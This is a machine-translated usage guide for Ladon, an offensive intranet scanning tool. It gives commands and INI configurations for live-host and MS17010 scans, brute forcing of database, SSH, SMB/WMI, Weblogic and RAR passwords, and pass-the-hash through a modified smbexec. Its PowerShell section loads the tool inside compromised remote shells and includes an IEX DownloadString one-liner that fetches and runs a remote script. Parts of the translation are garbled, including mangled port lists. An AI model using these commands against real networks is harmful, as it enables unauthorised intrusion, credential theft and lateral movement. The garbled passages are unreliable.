Command: Ladon 192.168.1.8/24 OnlinePC

0x002 file IP txt ip24.txt ip16.txt url. txt host. txt domain. txt str.txt

Create corresponding files in the root directory of the program. For example, use ip.txt for batch scanning of multiple IPs, and use ip24.txt for batch scanning of multiple C segments

There is no need to specify a TXT program to automatically load the file for scanning. For example, to scan a surviving host, just command: Ladon onlinepc

Disable ping scanning

The default scanning will first scan whether the host is alive through ICMP. When using the tool to forward Intranet

Or when ping is disabled on the target machine, use the noping parameter to scan, which is a little slower

Ladon noping

Ladon noping 192.168.1.8/24

Ladon noping 192.168.1.8/24 MS17010

Socks5 Proxy Scan

See: http://k8gege.org/Ladon/proxy.html

KaliLadon under linux/mac os

proxychains mono Ladon noping 192.168.1.8/24 MS17010

proxychains mono Ladon noping http://192.168.1.1 WhatCMS

Ladon.exe under Windows

Proxifier 3.42 and above are recommended, preferably the latest version 4.0.1

Example: scan the target section 10.1.2 for ms17010 vulnerabilities (noping must be added)

Ladon noping 10.1.2.8/24 MS17010

Configure INI to call arbitrary programs and password explosion

Applicable scenario: relevant commands or third-party tools need to be called for batch operation

Or there is a new POC, but it is too late or cannot be written into a DLL to call it

Many third-party tools do not support batch or batch network segments at all

But Ladon is not limited to batch IP, URL, IP segment, any content, etc

It is the most suitable tool for verifying whether there are loopholes in the intranet in an emergency

When new vulnerabilities come, it’s good if you can adjust the POC well. It takes more time to batch

Call the system ping command to probe the surviving host

ping.ini

[Ladon]

exe=cmd.exe

arg=/c ping $ip$

Command: Ladon ping.ini

Command: Ladon 192.168.1.8/24 ping.ini

Call Python POC to batch detect vulnerabilities

[Ladon]

exe=F:\Python279\python.exe

arg=CVE-2019-11043-POC. py $ip$

example: https://github.com/k8gege/CVE-2019-11043

User defined program password explosion

Example: Call the modified smbexec.exe to verify the HASH password. The original version cannot be exploded without exiting

There are four files in the root directory, smbexec.exe, smbhash.ini, user.txt, and pass.txt.

smbhash.ini

[Ladon]

exe=smbexec.exe

arg=-hashes $pass$ $user$@$ip$

isok=Launching semi-interactive shell

port=445

log=true

INI Parameter Description

Isok: success flag, required. If smbexec succeeds, it returns “Launching semi interactive shell”

Port: corresponding port, not required. If the SMB is 445, Ladon detects that the port is open first, and then performs password blasting

Log: program log; not required. If some programs return a bunch of error results, we don’t want to see them, can we not display them

Check whether intranet segment C uses the same password. Command: Ladon 192.168.1.1/24 smbhash.ini

See: http://k8gege.org/p/53177.html

Configure port scan parameters

Port.txt Custom Port

When using the portscan module, common high-risk vulnerability ports are scanned by default

Can Ladon scan when the default port is modified?

Use port.txt

Format 1: 80,2114333306445

Format 2: 80-88, 21-235800-5900

Format 3:

twenty-one

twenty-three

eighty

Format 4:

80-88

21-23

Command line custom port

Ladon 192.168.1.8/24 PortScan 80-89

Ladon 192.168.1.8-192.168.1.200 PortScan 22,80,1433,21,3306,1521

Configure password blasting parameters

  1. It supports standard user.txt and pass.txt account password cracking, and each user needs to run the password correctly or completely

2 Support userpass.txt (to store the user name and corresponding password), which is used to quickly verify whether other machines have the same account password

  1. It supports check.txt (storing IP/port/database name/user/password). If the port and database name are not specified, the default is used

User.txt and pass.txt store the user and password respectively

Userpass.txt stores the user password group, that is, each line stores the user and password

Check.txt each line stores IP \ port \ user \ password

Database password detection

The database is different from other password bursts. Sometimes the database has permissions, and the designated user can only connect to the designated database, but not to the default database

MSSQL password verification

(Large intranet may collect a large number of machine passwords from other machines. The first step must be to verify.)

If it is not the default port, please change the following port to the modified port. A single IP can be scanned directly by Ladon IP: port mssqlscan

check.txt

192.168.1.8 1433 master sa k8gege

192.168.1.8 sa k8gege

192.168.1.8 1433 sa k8gege

Command: Ladon MssqlScan

Oracle is the same

192.168.1.8 1521 orcl system k8gege

192.168.1.8 orcl system k8gege

192.168.1.8 system k8gege

Command: Ladon oraclescan

MySQL does not need to specify a database name

192.168.1.8 3306 root k8gege

192.168.1.8 root k8gege

Command: Ladon MysqlScan

System password
SSH password explosion

check.txt

192.168.1.8 22 root k8gege

192.168.1.8 root k8gege

Command: Ladon SshScan

Detailed usage: http://k8gege.org/Ladon/sshscan.html

SMB/WMI password explosion

check.txt

192.168.1.8 admin k8gege

Command: Ladon WmiScan or Ladon SmbScan

NTLM HASH Password Burst

check.txt

192.168.1.8 admin k8gege

Command: Ladon wmiscan or Ladon smbscan

Website password
Weblogic password blasting

check. Txt (URL user password)

http://192.168.1.8:7001/console weblogic k8gege

Command: Ladon weblogicscan

File password
Password explosion of RAR file

Since the RAR compressed package only needs one password, it only needs pass.txt. Note that the Chinese password needs to save TXT as ANSI code

Command: Ladon test rar RarScan

PowerShell

PowerLadon is perfectly compatible with win7-win10 PowerShell. For remote control that does not support plug-in. net programs, you can use

For the PowerShell version, you can also remotely load the memory under the CMD command line to achieve file free scanning. After the module is loaded, its usage is consistent with EXE.

0x001 PowerShell local loading

Suitable for supporting PowerShell interactive remote control or shell, such as cobalt strike

1
2
3
4
5
6

> powershell

> Import-Module .\Ladon.ps1

> Ladon OnlinePC

0x002 Cmd Local Load

It is applicable to remote control or shell that has not kept up with the times and only supports CMD interaction

1
2

> powershell Import-Module .\Ladon. ps1; Ladon OnlinePC

0x003 Cmd Remote Load

It is applicable to remote control or shell that has not kept up with the times and only supports CMD interaction

1
2

> powershell "IEX (New-Object Net.WebClient).DownloadString(' http://192.168.1.5:800/Ladon.ps1 '); Ladon OnlinePC"

0x004 remote control interactive CMD

0x005 Kitchen knife non interactive CMD

0x006 Empire non interactive CMD

There is a problem with the shell of Empire. The semicolon is truncated. You can add CMD / C

0x007 MSF Interactive CMD

Advanced usage

Ladon was originally designed as a scanning framework, with built-in functions for convenience

After all, it is troublesome to upload one more file to the target if you need to use one function

Unlike MSF, most frameworks and modules don’t matter, because you only use them locally

In order to allow everyone to customize the module, Ladon plug-in supports multiple programming languages

You can configure plug-ins through INI to learn that HTTP can generate POC through the EXP generator

Know programming, can use C #, Delphi, VC to write DLL and PowerShell scripts

0x001 exp generator

Exp generator tutorial: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage

Practical examples: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F -CVE-2018-2894

0x002 user defined module tutorial

Custom module tutorial: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle

0x003 plug in example source code

https://github.com/k8gege/Ladon/raw/master/MoudleDemo.rar

Complete tutorial: http://k8gege.org/Ladon

Ladon Download

Historical version: https://github.com/k8gege/Ladon/releases

911 version: https://k8gege.org/Download

扫码加入K8小密圈